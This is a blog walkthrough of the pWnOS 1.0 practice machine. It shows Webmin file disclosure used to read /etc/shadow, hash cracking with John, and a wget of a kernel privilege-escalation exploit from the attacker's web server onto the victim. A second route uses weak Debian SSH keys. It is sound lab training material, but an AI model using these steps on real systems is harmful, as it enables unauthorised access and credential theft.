Sunday , April 28 2019
CTF pWnOS 1.0 - Kamranmohsin.com
CTF pWnOS 1.0 - Kamranmohsin.com
Home / CTF / pWnOS: 1.0 Vulnerable Machine Walkthrough

pWnOS: 1.0 Vulnerable Machine Walkthrough

It’s been a long time, since I wrote a blog. I hope this time I continue writing with a vulnerable machine walk through.

You can easily download image for this VM from vulnhub.

The walk through will be in detail. Let’s start with this machine.

I have already hosted this virtual machine in my vmware workstation. You will prompt with below image once you start pWnOS machine whether in vmware workstation or in virtual machine.

pWnOS machine booted

I have already logged into my Kali machine. Its time to get the IP address of pWnOS machine by a command utility prebuilt in Kali i.e. netdiscover as seen below:

netdiscover

Knowing about the services running on target machine helps to build an attack surface. We use Nmap; a command-line utility to find services running on various ports on target system.

nmap

Various ports are open, we see that MiniServ 0.01 (Webmin httpd) server is running on port 10000, after googling I found that the target system is using vulnerable version. Luckily I found an exploit in Metasploit.

available exploit

Ist Method

Using the highlighted auxiliary module.

We see RPATH variable is set to /etc/passwd by default, let’s extract it:

/etc/passwd

Now set the RPATH variable to /etc/shadow and extract it too:

/etc/shadow

We got 5 hashes from shadow file, save the hashes in shadow.txt file as shown in command below.

John the ripper; a command-line utility will help to crack them using the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt --fork=5 shadow.txt

Luckily, John cracked 1 hash out of 5.

This cracked hash helped us to login via SSH as shown below:

Let’s see what rights/privileges vmware (user) have:

As we saw vmware got no rights/privileges, we further investigate about the kernel.

After googling we found the following exploit for vulnerable version of kernel, you can easily find it in Kali via searchsploit.

Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)

I have started apache2 web server on my kali machine to host this exploit publicly by the following command:

service apache2 start

Copy the exploit to web server.

cp /usr/share/exploitdb/exploits/linux/local/5092.c /var/www/html/

Now download the exploit in victim machine via limited shell and then compile the C program via gcc compiler which is pre-installed in Linux.

wget http://192.168.10.8/5092.c
gcc 5092.c -o exploit
./exploit

Hurray we got into root 😉

2nd Method

There is another method too. As we came across /etc/passwd, we saw that there were few users mentioned at the very end. Each user can login to pWnOS via SSH. Each user has authorized keys that are present in root directory but in a hidden directory .ssh, let’s get it via RPATH variable.

authorized key of vmware user

You might be thinking why we are interested in searching for authorized keys. Well, in this scenario we are lucky enough to have file disclosure vulnerability and we do have access to authorized keys file placed in home directory of each user. Each authorized key is mapped to RSA key.

Now from where to get RSA keys? Good question 😀 Google solved this problem too. Below link has a repository of keys both for 1024 and 2048 bits. But here we need 2048 bits of RSA keys.

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Below command will download the set of RSA keys. I have already downloaded into my Kali machine.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Now extract the file with the following command:

tar vxjf 5622.tar.bz2

Its time for brute forcing (to find the combination of authorized keys and RSA keys).

cd rsa
grep -lr authorized_key

We got it, now login via SSH and run the local Privilege Escalation exploit as we did in Ist method.

ssh -i 2048/d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.10.10

Hurray we got into root again 😀

If you are interested in reading configuration of SSH Key-Based Authentication on a Linux Server, do read my blog post here.

Thanks for stopping by here, if you like this blog post do leave a comment below.

About Kamran Mohsin

Kamran Mohsin
Kamran Mohsin is a Certified Ethical Hacker. Currently working as a Penetration Tester within a private company in Pakistan. He is also doing Masters in information Security. He worked in web development (front-back-end) from recent back years. With the passage of time he took interest in Hacking and started to write blogs on IS from late 2015.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: